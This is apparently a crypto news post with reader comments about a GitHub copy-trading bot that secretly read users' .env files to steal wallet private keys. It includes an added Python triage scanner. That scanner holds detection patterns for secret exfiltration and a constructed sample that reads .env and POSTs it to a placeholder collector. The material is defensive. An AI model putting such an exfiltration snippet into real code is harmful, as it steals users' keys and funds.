[Block Rhythm] has recently encountered a serious security issue that requires everyone's vigilance. Someone hid malicious code in a Polymarket copy trading Bots program released on GitHub: what appears to be a normal project secretly reads users' .env configuration files. This file typically holds the wallet Private Key, so once it is read, the attacker can move the funds directly.
What's even worse is that this developer repeatedly modified the code and submitted it to GitHub multiple times, deliberately concealing the malicious code. The security team has issued a warning, advising all users to check the trading Bots they have used, especially automated programs for copy trading. Before launching any third-party script, be sure to review the source code first, and don't be tempted by convenience.
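The post's advice is to read a bot's source before running it. The script below is an added example (not code from the post, from Block Rhythm, or from any bot project) of a small static triage aid that points a reviewer at the lines worth reading in a cloned repository: it flags code that reads a .env file as raw text instead of through a dotenv loader, secret-looking names on the same line as a network send, and files that both read secrets and talk to the network. The two sample files, and the names `COLLECTOR` and `API_URL` inside them, are constructed for the example.

```python
"""
Added example, not from the original post or any bot project: a static triage
helper for reviewing a third-party trading-bot repository before running it.
It is a heuristic that tells a reviewer where to look, not a verdict.
"""
import re
from pathlib import Path
from typing import Dict, List

# Names that usually mean "wallet secret", plus the .env file itself.
SECRET_NAME = r"PRIVATE_KEY|SECRET_KEY|MNEMONIC|SEED_PHRASE|\.env\b"
# Expected ways an honest bot loads its own configuration.
ENV_LOADER = r"load_dotenv|dotenv\.config|os\.environ|os\.getenv|process\.env"
# Reading the .env file as a plain file: open('.env'), fs.readFileSync('.env'), cat .env
RAW_ENV_READ = r"(\bopen|readFile(Sync)?|\bcat\b)\s*\(?\s*['\"]?[^'\"\n]*\.env\b"
# Anything that can move data off the machine.
NETWORK_SEND = (r"requests\.(post|put|get)|urllib\.request|http\.client|"
                r"fetch\(|axios\.|XMLHttpRequest|socket\.|\bcurl\s|\bwget\s|"
                r"webhook|discord\.com/api|api\.telegram\.org")
SOURCE_SUFFIXES = {".py", ".js", ".ts", ".mjs", ".cjs", ".sh"}


def scan_source(text: str) -> Dict[str, List[int]]:
    """Return the 1-based line numbers in `text` that match each pattern class."""
    hits: Dict[str, List[int]] = {"secret_ref": [], "env_loader": [], "raw_env_read": [],
                                  "network_send": [], "secret_with_send": []}
    for n, line in enumerate(text.splitlines(), start=1):
        if re.search(SECRET_NAME, line):
            hits["secret_ref"].append(n)
        if re.search(ENV_LOADER, line):
            hits["env_loader"].append(n)
        if re.search(RAW_ENV_READ, line):
            hits["raw_env_read"].append(n)
        if re.search(NETWORK_SEND, line):
            hits["network_send"].append(n)
            if re.search(SECRET_NAME, line):
                hits["secret_with_send"].append(n)
    return hits


def classify(hits: Dict[str, List[int]]) -> str:
    """HIGH: .env read as a file, or a secret name inside a network call.
    REVIEW: secrets and network traffic in the same file (normal for a trading
    bot, which must sign with its key and call an API; read those lines).
    LOW: nothing of note."""
    if hits["raw_env_read"] or hits["secret_with_send"]:
        return "HIGH"
    if (hits["secret_ref"] or hits["env_loader"]) and hits["network_send"]:
        return "REVIEW"
    return "LOW"


def triage_files(files: Dict[str, str]) -> Dict[str, str]:
    """Classify a {relative path: source text} mapping."""
    return {name: classify(scan_source(src)) for name, src in files.items()}


def triage_repo(root: str) -> Dict[str, str]:
    """Classify every source file under a cloned repository directory."""
    files = {str(p.relative_to(root)): p.read_text(errors="replace")
             for p in sorted(Path(root).rglob("*"))
             if p.is_file() and p.suffix in SOURCE_SUFFIXES}
    return triage_files(files)


# Constructed samples for the example, not real bot code.
SAMPLE_FILES = {
    # An honest bot: loads its own key through dotenv and calls the market API.
    "bot/trader.py": (
        "import os\n"
        "from dotenv import load_dotenv\n"
        "load_dotenv()\n"
        "KEY = os.environ['PRIVATE_KEY']\n"
        "resp = requests.get(API_URL + '/markets')\n"
    ),
    # The behaviour the post describes: the .env file itself is read and sent out.
    "bot/utils/helpers.js": (
        "const fs = require('fs');\n"
        "const blob = fs.readFileSync('.env', 'utf8');\n"
        "fetch(COLLECTOR, {method: 'POST', body: blob});\n"
    ),
}

if __name__ == "__main__":
    for name, level in triage_files(SAMPLE_FILES).items():
        print(f"{level:6} {name}")
```

Run it against a cloned repository with `triage_repo("/path/to/clone")` and read every HIGH and REVIEW file by hand; a REVIEW result is expected for the bot's main trading module, since it must load the key and reach the exchange. The patterns are plain regexes, so they will not see through string obfuscation or code pulled in from a dependency, which is why the post's advice to read the source still stands.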
TokenTherapist
· 12-23 05:51
Another one? There really is a new eyewash every day. I just withdrew from copy trading Bots two weeks ago, and I didn't expect to have dodged a bullet.
It's easy to talk about looking at the Source Code, but how many people really do that? Most people just copy, paste, and run it, and that's it.
The .env file is left there to be read directly; this is just plain theft, and GitHub's review process is too lax.
Submitting modifications repeatedly? That's just morally bankrupt, only thinking about how to scam money step by step.
Oh my god, how many people's Private Keys are going to be lost this time?
Stop using those shady tools, it's really not worth the gamble.
WhaleWatcher
· 12-23 00:07
Damn, here we go again. GitHub really has become a paradise for hackers; can such low-level tricks still fool people?
Human greed, copy trading Bots already come with risks, and now you want to check the source code before saying anything?
Brothers, stop using those shady tools, your Private Key is more valuable than your life.
This guy is ruthless, repeatedly submitting to cover up malicious code, he's really cunning.
I need to check if my Wallet has been tampered with; once you get hit by this kind of thing, it's a total loss.
There are all kinds of monsters and ghosts on GitHub now, never expose your .env file casually, folks.
Why are so many people still using third-party Bots? Isn't it better to write your own scripts?
LiquidationWizard
· 12-22 00:07
Oh my god, is this happening again? This kind of phishing code on GitHub really requires caution. The .env file directly exposes the Private Key, doesn’t this just completely reveal everything?
Copy trading Bots sound great, but ended up copying your own Wallet too, unbelievable.
The developers keep submitting hidden versions, this is downright naked fraud. Skipping the code review is really not an option; if anyone thinks they can be lazy and automate this, that’s the price to pay.
FloorSweeper
· 12-21 04:12
lol watched three people lose their entire stacks to this already... paper hands panic selling rn but the real alpha was never trusting github randos in the first place ngl
ContractTester
· 12-21 04:11
Damn, is this trap coming again? Bots on GitHub can't be trusted at all.
CryingOldWallet
· 12-21 04:09
Oh my god, it's this trap again, the Bots on GitHub are becoming increasingly untrustworthy...
Damn, the Private Key in the .env is gone? How careless do you have to be?
Developers repeatedly submit hidden malicious code, this is clearly premeditated...
Brothers who have used copy trading Bots should check quickly, don't wait until the Wallet is emptied to regret.
FadCatcher
· 12-21 04:02
This is that broken place called GitHub again, really have to be careful, you can't slack off when it comes to reading code.
GateUser-ccc36bc5
· 12-21 03:59
Here it comes again, these open source projects on GitHub really can't be trusted blindly. Moving warning, be sure to protect your Private Key.
Daring to move the private key, this developer is really bold.
How can there still be people using unaudited Bots? If you rush, you'll end up losing money.
The .env file configuration must be strictly protected, don’t foolishly run someone else’s code directly.
Planning to hide malicious code, this is no longer a bug, it’s outright Be Played for Suckers.
Now anything can be listed on GitHub, you have to keep your eyes open.
RooftopVIP
· 12-21 03:46
Wow, this method is too damaging. It maliciously submits hidden code repeatedly with premeditation, making it almost impossible to defend against.
---
No wonder my previous copy trading Bots ran out of money after a while; it turns out there are really such unscrupulous developers.
---
Now even GitHub has to be cautious. I have to review the Source Code myself before I dare to use it... web3 really can't tolerate any carelessness.
---
Reading the Private Key directly from the .env file is insane; who would have thought? It's so malicious.
---
Again it's the crypto world, again it's GitHub, and again the Private Key is stolen... when will this life ever be peaceful?
---
Damn, I'm glad I've never used copy trading Bots; it seems I need to be more vigilant.
---
This kind of premeditated attack is scarier than random vulnerabilities; there's simply no way to prevent it.
Beware of Polymarket copy trading Bots hiding malicious code, hackers steal Private Key through .env file.